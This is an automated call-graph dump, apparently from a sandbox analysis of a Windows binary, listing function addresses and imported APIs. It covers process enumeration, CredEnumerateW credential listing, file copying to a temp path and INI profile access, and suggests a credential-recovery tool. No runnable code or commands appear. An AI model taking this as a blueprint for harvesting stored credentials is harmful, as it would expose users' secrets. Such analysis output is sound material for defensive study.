40b633 37896->37988 37898 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37903 412957 CoUninitialize 37898->37903 37909 4128ca 37898->37909 37903->37887 37904->37865 37904->37866 37905 4128d0 TranslateAcceleratorW 37906 412941 GetMessageW 37905->37906 37905->37909 37906->37903 37906->37905 37907 412909 IsDialogMessageW 37907->37906 37907->37909 37908 4128fd IsDialogMessageW 37908->37906 37908->37907 37909->37905 37909->37907 37909->37908 37910 41292b TranslateMessage DispatchMessageW 37909->37910 37911 41291f IsDialogMessageW 37909->37911 37910->37906 37911->37906 37911->37910 37913 4044f7 37912->37913 37914 4044cf GetProcAddress 37912->37914 37918 404507 MessageBoxW 37913->37918 37919 40451e 37913->37919 37915 4044e8 FreeLibrary 37914->37915 37917 4044df 37914->37917 37915->37913 37916 4044f3 37915->37916 37916->37913 37917->37915 37918->37872 37919->37872 37921 414b8a 37920->37921 37922 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37920->37922 37992 40a804 memset 37921->37992 37922->37875 37925 414b9e GetProcAddress 37925->37922 37927 4124e0 37926->37927 37928 412505 ??2@YAPAXI 37927->37928 37929 41251c 37928->37929 37931 412521 37928->37931 38014 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37929->38014 38003 444722 37931->38003 37937 41259b wcscpy 37937->37877 38019 40b1ab free free 37938->38019 37942 40a9ce malloc memcpy free free 37945 40ac5c 37942->37945 37943 40ad4b 37951 40ad76 37943->37951 38043 40a9ce 37943->38043 37945->37942 37945->37943 37946 40ace7 free 37945->37946 37945->37951 38023 40a8d0 37945->38023 38035 4099f4 37945->38035 37946->37945 37950 40a8d0 7 API calls 37950->37951 38020 40aa04 37951->38020 37952 40ada2 37953 40adc9 37952->37953 37954 40adaa 37952->37954 37953->37882 37953->37883 37954->37953 37955 40adb3 _wcsicmp 37954->37955 37955->37953 37955->37954 38048 40dce0 37956->38048 37958 40dd3a GetModuleHandleW 38053 40dba7 37958->38053 37962 40dce0 3 API calls 37961->37962 37963 40db99 37962->37963 38125 40dae1 37963->38125 38139 402f3a 37966->38139 37968 412766 37968->37887 37968->37892 37969 4126d3 _wcsicmp 37970 4126a8 37969->37970 37970->37968 37970->37969 37972 41270a 37970->37972 38173 4125f8 7 API calls 37970->38173 37972->37968 38142 411ac5 37972->38142 37983 4125da 37982->37983 37984 4125f0 37983->37984 37985 4125e6 DeleteObject 37983->37985 37987 40b1ab free free 37984->37987 37985->37984 37986->37898 37987->37896 37989 40b640 37988->37989 37990 40b639 free 37988->37990 37991 40b1ab free free 37989->37991 37990->37989 37991->37904 37993 40a83b GetSystemDirectoryW 37992->37993 37994 40a84c wcscpy 37992->37994 37993->37994 37999 409719 wcslen 37994->37999 37997 40a881 LoadLibraryW 37998 40a886 37997->37998 37998->37922 37998->37925 38000 409724 37999->38000 38001 409739 wcscat LoadLibraryW 37999->38001 38000->38001 38002 40972c wcscat 38000->38002 38001->37997 38001->37998 38002->38001 38004 444732 38003->38004 38005 444728 DeleteObject 38003->38005 38015 409cc3 38004->38015 38005->38004 38007 412551 38008 4010f9 38007->38008 38009 401130 38008->38009 38010 401134 GetModuleHandleW LoadIconW 38009->38010 38011 401107 wcsncat 38009->38011 38012 40a7be 38010->38012 38011->38009 38013 40a7d2 38012->38013 38013->37937 38013->38013 38014->37931 38018 409bfd memset wcscpy 38015->38018 38017 409cdb CreateFontIndirectW 38017->38007 38018->38017 38019->37945 38021 40aa14 38020->38021 38022 40aa0a free 38020->38022 38021->37952 38022->38021 38024 40a8eb 38023->38024 38025 40a8df wcslen 38023->38025 38026 40a906 free 38024->38026 38027 40a90f 38024->38027 38025->38024 38028 40a919 38026->38028 38029 4099f4 3 API calls 38027->38029 38030 40a932 38028->38030 38031 40a929 free 38028->38031 38029->38028 38033 4099f4 3 API calls 38030->38033 38032 40a93e memcpy 38031->38032 38032->37945 38034 40a93d 38033->38034 38034->38032 38036 409a41 38035->38036 38037 4099fb malloc 38035->38037 38036->37945 38039 409a37 38037->38039 38040 409a1c 38037->38040 38039->37945 38041 409a30 free 38040->38041 38042 409a20 memcpy 38040->38042 38041->38039 38042->38041 38044 40a9e7 38043->38044 38045 40a9dc free 38043->38045 38046 4099f4 3 API calls 38044->38046 38047 40a9f2 38045->38047 38046->38047 38047->37950 38072 409bca GetModuleFileNameW 38048->38072 38050 40dce6 wcsrchr 38051 40dcf5 38050->38051 38052 40dcf9 wcscat 38050->38052 38051->38052 38052->37958 38073 44db70 38053->38073 38055 40dbb4 memset memset 38075 409bca GetModuleFileNameW 38055->38075 38057 40dbfd 38076 4447d9 38057->38076 38060 40dc34 wcscpy wcscpy 38102 40d6f5 38060->38102 38061 40dc1f wcscpy 38061->38060 38064 40d6f5 3 API calls 38065 40dc73 38064->38065 38066 40d6f5 3 API calls 38065->38066 38067 40dc89 38066->38067 38068 40d6f5 3 API calls 38067->38068 38069 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38068->38069 38108 40da80 38069->38108 38072->38050 38074 44db77 38073->38074 38074->38055 38074->38074 38075->38057 38077 4447f4 38076->38077 38078 40dc1b 38077->38078 38079 444807 ??2@YAPAXI 38077->38079 38078->38060 38078->38061 38080 44481f 38079->38080 38081 444873 _snwprintf 38080->38081 38082 4448ab wcscpy 38080->38082 38115 44474a 8 API calls 38081->38115 38084 4448bb 38082->38084 38116 44474a 8 API calls 38084->38116 38085 4448a7 38085->38082 38085->38084 38087 4448cd 38117 44474a 8 API calls 38087->38117 38089 4448e2 38118 44474a 8 API calls 38089->38118 38091 4448f7 38119 44474a 8 API calls 38091->38119 38093 44490c 38120 44474a 8 API calls 38093->38120 38095 444921 38121 44474a 8 API calls 38095->38121 38097 444936 38122 44474a 8 API calls 38097->38122 38099 44494b 38123 44474a 8 API calls 38099->38123 38101 444960 ??3@YAXPAX 38101->38078 38103 44db70 38102->38103 38104 40d702 memset GetPrivateProfileStringW 38103->38104 38105 40d752 38104->38105 38106 40d75c WritePrivateProfileStringW 38104->38106 38105->38106 38107 40d758 38105->38107 38106->38107 38107->38064 38109 44db70 38108->38109 38110 40da8d memset 38109->38110 38111 40daac LoadStringW 38110->38111 38112 40dac6 38111->38112 38112->38111 38113 40dade 38112->38113 38124 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38112->38124 38113->37887 38115->38085 38116->38087 38117->38089 38118->38091 38119->38093 38120->38095 38121->38097 38122->38099 38123->38101 38124->38112 38135 409b98 GetFileAttributesW 38125->38135 38127 40daea 38128 40db63 38127->38128 38129 40daef wcscpy wcscpy GetPrivateProfileIntW 38127->38129 38128->37888 38136 40d65d GetPrivateProfileStringW 38129->38136 38131 40db3e 38137 40d65d GetPrivateProfileStringW 38131->38137 38133 40db4f 38138 40d65d GetPrivateProfileStringW 38133->38138 38135->38127 38136->38131 38137->38133 38138->38128 38174 40eaff 38139->38174 38143 411ae2 memset 38142->38143 38144 411b8f 38142->38144 38214 409bca GetModuleFileNameW 38143->38214 38156 411a8b 38144->38156 38146 411b0a wcsrchr 38147 411b22 wcscat 38146->38147 38148 411b1f 38146->38148 38215 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38147->38215 38148->38147 38150 411b67 38216 402afb 38150->38216 38154 411b7f 38272 40ea13 SendMessageW memset SendMessageW 38154->38272 38157 402afb 27 API calls 38156->38157 38158 411ac0 38157->38158 38159 4110dc 38158->38159 38160 41113e 38159->38160 38165 4110f0 38159->38165 38297 40969c LoadCursorW SetCursor 38160->38297 38162 411143 38298 4032b4 38162->38298 38316 444a54 38162->38316 38163 4110f7 _wcsicmp 38163->38165 38164 411157 38166 40ada2 _wcsicmp 38164->38166 38165->38160 38165->38163 38319 410c46 10 API calls 38165->38319 38169 411167 38166->38169 38167 4111af 38169->38167 38170 4111a6 qsort 38169->38170 38170->38167 38173->37970 38175 40eb10 38174->38175 38187 40e8e0 38175->38187 38178 40eb6c memcpy memcpy 38179 40ebb7 38178->38179 38179->38178 38180 40ebf2 ??2@YAPAXI ??2@YAPAXI 38179->38180 38182 40d134 16 API calls 38179->38182 38181 40ec2e ??2@YAPAXI 38180->38181 38184 40ec65 38180->38184 38181->38184 38182->38179 38184->38184 38197 40ea7f 38184->38197 38186 402f49 38186->37970 38188 40e8f2 38187->38188 38189 40e8eb ??3@YAXPAX 38187->38189 38190 40e900 38188->38190 38191 40e8f9 ??3@YAXPAX 38188->38191 38189->38188 38192 40e911 38190->38192 38193 40e90a ??3@YAXPAX 38190->38193 38191->38190 38194 40e931 ??2@YAPAXI ??2@YAPAXI 38192->38194 38195 40e921 ??3@YAXPAX 38192->38195 38196 40e92a ??3@YAXPAX 38192->38196 38193->38192 38194->38178 38195->38196 38196->38194 38198 40aa04 free 38197->38198 38199 40ea88 38198->38199 38200 40aa04 free 38199->38200 38201 40ea90 38200->38201 38202 40aa04 free 38201->38202 38203 40ea98 38202->38203 38204 40aa04 free 38203->38204 38205 40eaa0 38204->38205 38206 40a9ce 4 API calls 38205->38206 38207 40eab3 38206->38207 38208 40a9ce 4 API calls 38207->38208 38209 40eabd 38208->38209 38210 40a9ce 4 API calls 38209->38210 38211 40eac7 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40ead1 38212->38213 38213->38186 38214->38146 38215->38150 38273 40b2cc 38216->38273 38218 402b0a 38219 40b2cc 27 API calls 38218->38219 38220 402b23 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402b3a 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402b54 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402b6b 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b82 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b99 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402bb0 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402bc7 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402bde 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bf5 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402c0c 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402c23 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402c3a 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c51 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c68 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c7f 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c99 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402cb3 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402cd5 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402cf0 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402d0b 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402d26 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402d3e 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d59 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d78 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d93 38269->38270 38271 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38270->38271 38271->38154 38272->38144 38276 40b58d 38273->38276 38275 40b2d1 38275->38218 38277 40b5a4 GetModuleHandleW FindResourceW 38276->38277 38278 40b62e 38276->38278 38279 40b5c2 LoadResource 38277->38279 38281 40b5e7 38277->38281 38278->38275 38280 40b5d0 SizeofResource LockResource 38279->38280 38279->38281 38280->38281 38281->38278 38289 40afcf 38281->38289 38283 40b608 memcpy 38292 40b4d3 memcpy 38283->38292 38285 40b61e 38293 40b3c1 18 API calls 38285->38293 38287 40b626 38294 40b04b 38287->38294 38290 40b04b ??3@YAXPAX 38289->38290 38291 40afd7 ??2@YAPAXI 38290->38291 38291->38283 38292->38285 38293->38287 38295 40b051 ??3@YAXPAX 38294->38295 38296 40b05f 38294->38296 38295->38296 38296->38278 38297->38162 38299 4032c4 38298->38299 38300 40b633 free 38299->38300 38301 403316 38300->38301 38320 44553b 38301->38320 38305 403480 38518 40368c 15 API calls 38305->38518 38307 403489 38308 40b633 free 38307->38308 38309 403495 38308->38309 38309->38164 38310 4033a9 memset memcpy 38311 4033ec wcscmp 38310->38311 38312 40333c 38310->38312 38311->38312 38312->38305 38312->38310 38312->38311 38516 4028e7 11 API calls 38312->38516 38517 40f508 6 API calls 38312->38517 38314 403421 _wcsicmp 38314->38312 38317 444a64 FreeLibrary 38316->38317 38318 444a83 38316->38318 38317->38318 38318->38164 38319->38165 38321 445548 38320->38321 38322 445599 38321->38322 38519 40c768 38321->38519 38323 4455a8 memset 38322->38323 38330 4457f2 38322->38330 38602 403988 38323->38602 38334 445854 38330->38334 38704 403e2d memset memset memset memset memset 38330->38704 38331 445672 38613 403fbe memset memset memset memset memset 38331->38613 38332 4458bb memset memset 38337 414c2e 16 API calls 38332->38337 38382 4458aa 38334->38382 38727 403c9c memset memset memset memset memset 38334->38727 38335 44595e memset memset 38341 414c2e 16 API calls 38335->38341 38336 4455e5 38336->38331 38344 44560f 38336->38344 38342 4458f9 38337->38342 38338 44557a 38379 44558c 38338->38379 38799 4136c0 CoTaskMemFree 38338->38799 38340 445a00 memset memset 38750 414c2e 38340->38750 38352 44599c 38341->38352 38353 40b2cc 27 API calls 38342->38353 38356 4087b3 338 API calls 38344->38356 38346 445849 38815 40b1ab free free 38346->38815 38347 445bca 38354 445c8b memset memset 38347->38354 38421 445cf0 38347->38421 38348 445b38 memset memset memset 38359 445bd4 38348->38359 38360 445b98 38348->38360 38363 40b2cc 27 API calls 38352->38363 38355 445909 38353->38355 38367 414c2e 16 API calls 38354->38367 38364 409d1f 6 API calls 38355->38364 38365 445621 38356->38365 38357 445585 38800 41366b FreeLibrary 38357->38800 38358 44589f 38816 40b1ab free free 38358->38816 38373 414c2e 16 API calls 38359->38373 38360->38359 38369 445ba2 38360->38369 38366 4459ac 38363->38366 38375 445919 38364->38375 38801 4454bf 20 API calls 38365->38801 38377 409d1f 6 API calls 38366->38377 38378 445cc9 38367->38378 38888 4099c6 wcslen 38369->38888 38370 4456b2 38803 40b1ab free free 38370->38803 38372 40b2cc 27 API calls 38383 445a4f 38372->38383 38385 445be2 38373->38385 38374 403335 38515 4452e5 45 API calls 38374->38515 38817 409b98 GetFileAttributesW 38375->38817 38376 445823 38376->38346 38389 4087b3 338 API calls 38376->38389 38391 4459bc 38377->38391 38392 409d1f 6 API calls 38378->38392 38586 444b06 38379->38586 38380 445879 38380->38358 38402 4087b3 338 API calls 38380->38402 38382->38332 38407 44594a 38382->38407 38765 409d1f wcslen wcslen 38383->38765 38396 40b2cc 27 API calls 38385->38396 38386 445d3d 38406 40b2cc 27 API calls 38386->38406 38387 445d88 memset memset memset 38390 414c2e 16 API calls 38387->38390 38389->38376 38399 445dde 38390->38399 38884 409b98 GetFileAttributesW 38391->38884 38401 445ce1 38392->38401 38393 445bb3 38891 445403 memset 38393->38891 38394 445680 38394->38370 38636 4087b3 memset 38394->38636 38405 445bf3 38396->38405 38397 445928 38397->38407 38818 40b6ef 38397->38818 38408 40b2cc 27 API calls 38399->38408 38908 409b98 GetFileAttributesW 38401->38908 38402->38380 38414 409d1f 6 API calls 38405->38414 38416 445d54 _wcsicmp 38406->38416 38407->38335 38420 4459ed 38407->38420 38419 445def 38408->38419 38409 4459cb 38409->38420 38430 40b6ef 253 API calls 38409->38430 38413 40b2cc 27 API calls 38423 445a94 38413->38423 38415 445c07 38414->38415 38426 445389 259 API calls 38415->38426 38427 445d71 38416->38427 38493 445d67 38416->38493 38418 445665 38802 40b1ab free free 38418->38802 38428 409d1f 6 API calls 38419->38428 38420->38340 38463 445b22 38420->38463 38421->38374 38421->38386 38421->38387 38422 445389 259 API calls 38422->38347 38770 40ae18 38423->38770 38424 44566d 38424->38330 38687 413d4c 38424->38687 38433 445c17 38426->38433 38909 445093 23 API calls 38427->38909 38436 445e03 38428->38436 38430->38420 38432 4456d8 38437 40b2cc 27 API calls 38432->38437 38438 40b2cc 27 API calls 38433->38438 38435 44563c 38435->38418 38440 4087b3 338 API calls 38435->38440 38910 409b98 GetFileAttributesW 38436->38910 38443 4456e2 38437->38443 38444 445c23 38438->38444 38439 445d83 38439->38374 38440->38435 38442 40b6ef 253 API calls 38442->38374 38804 413fa6 _wcsicmp _wcsicmp 38443->38804 38448 409d1f 6 API calls 38444->38448 38446 445e12 38453 445e6b 38446->38453 38459 40b2cc 27 API calls 38446->38459 38451 445c37 38448->38451 38449 445aa1 38452 445b17 38449->38452 38467 445ab2 memset 38449->38467 38481 409d1f 6 API calls 38449->38481 38777 40add4 38449->38777 38782 445389 38449->38782 38791 40ae51 38449->38791 38450 4456eb 38455 4456fd memset memset memset memset 38450->38455 38456 4457ea 38450->38456 38457 445389 259 API calls 38451->38457 38885 40aebe 38452->38885 38912 445093 23 API calls 38453->38912 38805 409c70 wcscpy wcsrchr 38455->38805 38808 413d29 38456->38808 38462 445c47 38457->38462 38464 445e33 38459->38464 38469 40b2cc 27 API calls 38462->38469 38463->38347 38463->38348 38470 409d1f 6 API calls 38464->38470 38466 445e7e 38471 445f67 38466->38471 38472 40b2cc 27 API calls 38467->38472 38474 445c53 38469->38474 38475 445e47 38470->38475 38476 40b2cc 27 API calls 38471->38476 38472->38449 38473 409c70 2 API calls 38477 44577e 38473->38477 38478 409d1f 6 API calls 38474->38478 38911 409b98 GetFileAttributesW 38475->38911 38480 445f73 38476->38480 38482 409c70 2 API calls 38477->38482 38483 445c67 38478->38483 38485 409d1f 6 API calls 38480->38485 38481->38449 38486 44578d 38482->38486 38487 445389 259 API calls 38483->38487 38484 445e56 38484->38453 38490 445e83 memset 38484->38490 38488 445f87 38485->38488 38486->38456 38492 40b2cc 27 API calls 38486->38492 38487->38347 38915 409b98 GetFileAttributesW 38488->38915 38494 40b2cc 27 API calls 38490->38494 38496 4457a8 38492->38496 38493->38374 38493->38442 38495 445eab 38494->38495 38497 409d1f 6 API calls 38495->38497 38498 409d1f 6 API calls 38496->38498 38499 445ebf 38497->38499 38500 4457b8 38498->38500 38501 40ae18 9 API calls 38499->38501 38807 409b98 GetFileAttributesW 38500->38807 38511 445ef5 38501->38511 38503 4457c7 38503->38456 38505 4087b3 338 API calls 38503->38505 38504 40ae51 9 API calls 38504->38511 38505->38456 38506 445f5c 38508 40aebe FindClose 38506->38508 38507 40add4 2 API calls 38507->38511 38508->38471 38509 40b2cc 27 API calls 38509->38511 38510 409d1f 6 API calls 38510->38511 38511->38504 38511->38506 38511->38507 38511->38509 38511->38510 38513 445f3a 38511->38513 38913 409b98 GetFileAttributesW 38511->38913 38914 445093 23 API calls 38513->38914 38515->38312 38516->38314 38517->38312 38518->38307 38520 40c775 38519->38520 38916 40b1ab free free 38520->38916 38522 40c788 38917 40b1ab free free 38522->38917 38524 40c790 38918 40b1ab free free 38524->38918 38526 40c798 38527 40aa04 free 38526->38527 38528 40c7a0 38527->38528 38919 40c274 memset 38528->38919 38533 40a8ab 9 API calls 38534 40c7c3 38533->38534 38535 40a8ab 9 API calls 38534->38535 38536 40c7d0 38535->38536 38948 40c3c3 38536->38948 38540 40c877 38549 40bdb0 38540->38549 38541 40c86c 38990 4053fe 39 API calls 38541->38990 38543 40c7e5 38543->38540 38543->38541 38548 40c634 50 API calls 38543->38548 38973 40a706 38543->38973 38548->38543 39158 404363 38549->39158 38552 40bf5d 39178 40440c 38552->39178 38554 40bdee 38554->38552 38557 40b2cc 27 API calls 38554->38557 38555 40bddf CredEnumerateW 38555->38554 38558 40be02 wcslen 38557->38558 38558->38552 38561 40be1e 38558->38561 38559 40be26 wcsncmp 38559->38561 38561->38552 38561->38559 38563 40be7d memset 38561->38563 38564 40bea7 memcpy 38561->38564 38565 40bf11 wcschr 38561->38565 38566 40b2cc 27 API calls 38561->38566 38568 40bf43 LocalFree 38561->38568 39181 40bd5d 28 API calls 38561->39181 39182 404423 38561->39182 38563->38561 38563->38564 38564->38561 38564->38565 38565->38561 38567 40bef6 _wcsnicmp 38566->38567 38567->38561 38567->38565 38568->38561 38569 4135f7 39197 4135e0 38569->39197 38572 40b2cc 27 API calls 38573 41360d 38572->38573 38574 40a804 8 API calls 38573->38574 38575 413613 38574->38575 38576 41361b 38575->38576 38577 41363e 38575->38577 38578 40b273 27 API calls 38576->38578 38579 4135e0 FreeLibrary 38577->38579 38580 413625 GetProcAddress 38578->38580 38581 413643 38579->38581 38580->38577 38582 413648 38580->38582 38581->38338 38583 413658 38582->38583 38584 4135e0 FreeLibrary 38582->38584 38583->38338 38585 413666 38584->38585 38585->38338 39200 4449b9 38586->39200 38589 444c1f 38589->38322 38590 4449b9 42 API calls 38592 444b4b 38590->38592 38591 444c15 38594 4449b9 42 API calls 38591->38594 38592->38591 39221 444972 GetVersionExW 38592->39221 38594->38589 38595 444b99 memcmp 38600 444b8c 38595->38600 38596 444c0b 39225 444a85 42 API calls 38596->39225 38600->38595 38600->38596 39222 444aa5 42 API calls 38600->39222 39223 40a7a0 GetVersionExW 38600->39223 39224 444a85 42 API calls 38600->39224 38603 40399d 38602->38603 39226 403a16 38603->39226 38605 403a09 39240 40b1ab free free 38605->39240 38607 4039a3 38607->38605 38611 4039f4 38607->38611 39237 40a02c CreateFileW 38607->39237 38608 403a12 wcsrchr 38608->38336 38611->38605 38612 4099c6 2 API calls 38611->38612 38612->38605 38614 414c2e 16 API calls 38613->38614 38615 404048 38614->38615 38616 414c2e 16 API calls 38615->38616 38617 404056 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 404073 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 40408e 38620->38621 38622 409d1f 6 API calls 38621->38622 38623 4040a6 38622->38623 38624 403af5 20 API calls 38623->38624 38625 4040ba 38624->38625 38626 403af5 20 API calls 38625->38626 38627 4040cb 38626->38627 39267 40414f memset 38627->39267 38629 404140 39281 40b1ab free free 38629->39281 38631 4040ec memset 38634 4040e0 38631->38634 38632 404148 38632->38394 38633 4099c6 2 API calls 38633->38634 38634->38629 38634->38631 38634->38633 38635 40a8ab 9 API calls 38634->38635 38635->38634 39294 40a6e6 WideCharToMultiByte 38636->39294 38638 4087ed 39295 4095d9 memset 38638->39295 38641 408953 38641->38394 38642 408809 memset memset memset memset memset 38643 40b2cc 27 API calls 38642->38643 38644 4088a1 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088b1 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088c0 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 4088d0 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 4088df 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 4088ef 38653->38654 38655 40b2cc 27 API calls 38654->38655 38656 4088fe 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 40890e 38657->38658 38659 40b2cc 27 API calls 38658->38659 38660 40891d 38659->38660 38661 409d1f 6 API calls 38660->38661 38662 40892d 38661->38662 39314 409b98 GetFileAttributesW 38662->39314 38664 40893e 38665 408943 38664->38665 38666 408958 38664->38666 39315 407fdf 75 API calls 38665->39315 39316 409b98 GetFileAttributesW 38666->39316 38688 40b633 free 38687->38688 38689 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38688->38689 38690 413f00 Process32NextW 38689->38690 38691 413da5 OpenProcess 38690->38691 38692 413f17 CloseHandle 38690->38692 38693 413df3 memset 38691->38693 38696 413eb0 38691->38696 38692->38432 39616 413f27 38693->39616 38695 413ebf free 38695->38696 38696->38690 38696->38695 38697 4099f4 3 API calls 38696->38697 38697->38696 38699 413e37 GetModuleHandleW 38700 413e1f 38699->38700 38701 413e46 GetProcAddress 38699->38701 38700->38699 39621 413959 38700->39621 39637 413ca4 38700->39637 38701->38700 38703 413ea2 CloseHandle 38703->38696 38705 414c2e 16 API calls 38704->38705 38706 403eb7 38705->38706 38707 414c2e 16 API calls 38706->38707 38708 403ec5 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 403ee2 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 403efd 38711->38712 38713 409d1f 6 API calls 38712->38713 38714 403f15 38713->38714 38715 403af5 20 API calls 38714->38715 38716 403f29 38715->38716 38717 403af5 20 API calls 38716->38717 38718 403f3a 38717->38718 38719 40414f 33 API calls 38718->38719 38720 403f4f 38719->38720 38721 403faf 38720->38721 38722 403f5b memset 38720->38722 38725 4099c6 2 API calls 38720->38725 38726 40a8ab 9 API calls 38720->38726 39651 40b1ab free free 38721->39651 38722->38720 38724 403fb7 38724->38376 38725->38720 38726->38720 38728 414c2e 16 API calls 38727->38728 38729 403d26 38728->38729 38730 414c2e 16 API calls 38729->38730 38731 403d34 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 403d51 38732->38733 38734 409d1f 6 API calls 38733->38734 38735 403d6c 38734->38735 38736 409d1f 6 API calls 38735->38736 38737 403d84 38736->38737 38738 403af5 20 API calls 38737->38738 38739 403d98 38738->38739 38740 403af5 20 API calls 38739->38740 38741 403da9 38740->38741 38742 40414f 33 API calls 38741->38742 38746 403dbe 38742->38746 38743 403e1e 39652 40b1ab free free 38743->39652 38745 403dca memset 38745->38746 38746->38743 38746->38745 38748 4099c6 2 API calls 38746->38748 38749 40a8ab 9 API calls 38746->38749 38747 403e26 38747->38380 38748->38746 38749->38746 38751 414b81 9 API calls 38750->38751 38752 414c40 38751->38752 38753 414c73 memset 38752->38753 39653 409cea 38752->39653 38754 414c94 38753->38754 39656 414592 RegOpenKeyExW 38754->39656 38758 414c64 38758->38372 38759 414cc1 38760 414cf4 wcscpy 38759->38760 39657 414bb0 wcscpy 38759->39657 38760->38758 38762 414cd2 39658 4145ac RegQueryValueExW 38762->39658 38764 414ce9 RegCloseKey 38764->38760 38766 409d62 38765->38766 38767 409d43 wcscpy 38765->38767 38766->38413 38768 409719 2 API calls 38767->38768 38769 409d51 wcscat 38768->38769 38769->38766 38771 40aebe FindClose 38770->38771 38772 40ae21 38771->38772 38773 4099c6 2 API calls 38772->38773 38774 40ae35 38773->38774 38775 409d1f 6 API calls 38774->38775 38776 40ae49 38775->38776 38776->38449 38778 40ade0 38777->38778 38779 40ae0f 38777->38779 38778->38779 38780 40ade7 wcscmp 38778->38780 38779->38449 38780->38779 38781 40adfe wcscmp 38780->38781 38781->38779 38783 40ae18 9 API calls 38782->38783 38789 4453c4 38783->38789 38784 40ae51 9 API calls 38784->38789 38785 4453f3 38787 40aebe FindClose 38785->38787 38786 40add4 2 API calls 38786->38789 38788 4453fe 38787->38788 38788->38449 38789->38784 38789->38785 38789->38786 38790 445403 254 API calls 38789->38790 38790->38789 38792 40ae7b FindNextFileW 38791->38792 38793 40ae5c FindFirstFileW 38791->38793 38794 40ae94 38792->38794 38795 40ae8f 38792->38795 38793->38794 38796 40aeb6 38794->38796 38797 409d1f 6 API calls 38794->38797 38798 40aebe FindClose 38795->38798 38796->38449 38797->38796 38798->38794 38799->38357 38800->38379 38801->38435 38802->38424 38803->38424 38804->38450 38806 409c89 38805->38806 38806->38473 38807->38503 38809 413d39 38808->38809 38810 413d2f FreeLibrary 38808->38810 38811 40b633 free 38809->38811 38810->38809 38812 413d42 38811->38812 38813 40b633 free 38812->38813 38814 413d4a 38813->38814 38814->38330 38815->38334 38816->38382 38817->38397 38819 44db70 38818->38819 38820 40b6fc memset 38819->38820 38821 409c70 2 API calls 38820->38821 38822 40b732 wcsrchr 38821->38822 38823 40b743 38822->38823 38824 40b746 memset 38822->38824 38823->38824 38825 40b2cc 27 API calls 38824->38825 38826 40b76f 38825->38826 38827 409d1f 6 API calls 38826->38827 38828 40b783 38827->38828 39659 409b98 GetFileAttributesW 38828->39659 38830 40b792 38831 40b7c2 38830->38831 38832 409c70 2 API calls 38830->38832 39660 40bb98 38831->39660 38834 40b7a5 38832->38834 38836 40b2cc 27 API calls 38834->38836 38839 40b7b2 38836->38839 38837 40b837 CloseHandle 38841 40b83e memset 38837->38841 38838 40b817 39694 409a45 GetTempPathW 38838->39694 38842 409d1f 6 API calls 38839->38842 39693 40a6e6 WideCharToMultiByte 38841->39693 38842->38831 38843 40b827 CopyFileW 38843->38841 38845 40b866 38846 444432 121 API calls 38845->38846 38847 40b879 38846->38847 38848 40bad5 38847->38848 38849 40b273 27 API calls 38847->38849 38850 40baeb 38848->38850 38851 40bade DeleteFileW 38848->38851 38852 40b89a 38849->38852 38853 40b04b ??3@YAXPAX 38850->38853 38851->38850 38854 438552 134 API calls 38852->38854 38855 40baf3 38853->38855 38856 40b8a4 38854->38856 38855->38407 38857 40bacd 38856->38857 38859 4251c4 137 API calls 38856->38859 38858 443d90 111 API calls 38857->38858 38858->38848 38881 40b8b8 38859->38881 38860 40bac6 39706 424f26 123 API calls 38860->39706 38861 40b8bd memset 39697 425413 17 API calls 38861->39697 38864 425413 17 API calls 38864->38881 38867 40a71b MultiByteToWideChar 38867->38881 38870 40b9b5 memcmp 38870->38881 38871 4099c6 2 API calls 38871->38881 38872 404423 38 API calls 38872->38881 38875 40bb3e memset memcpy 39707 40a734 MultiByteToWideChar 38875->39707 38876 4251c4 137 API calls 38876->38881 38878 40bb88 LocalFree 38878->38881 38881->38860 38881->38861 38881->38864 38881->38867 38881->38870 38881->38871 38881->38872 38881->38875 38881->38876 38882 40ba5f memcmp 38881->38882 38883 40a734 MultiByteToWideChar 38881->38883 39698 4253ef 16 API calls 38881->39698 39699 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38881->39699 39700 4253af 17 API calls 38881->39700 39701 4253cf 17 API calls 38881->39701 39702 447280 memset 38881->39702 39703 447960 memset memcpy memcpy memcpy 38881->39703 39704 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38881->39704 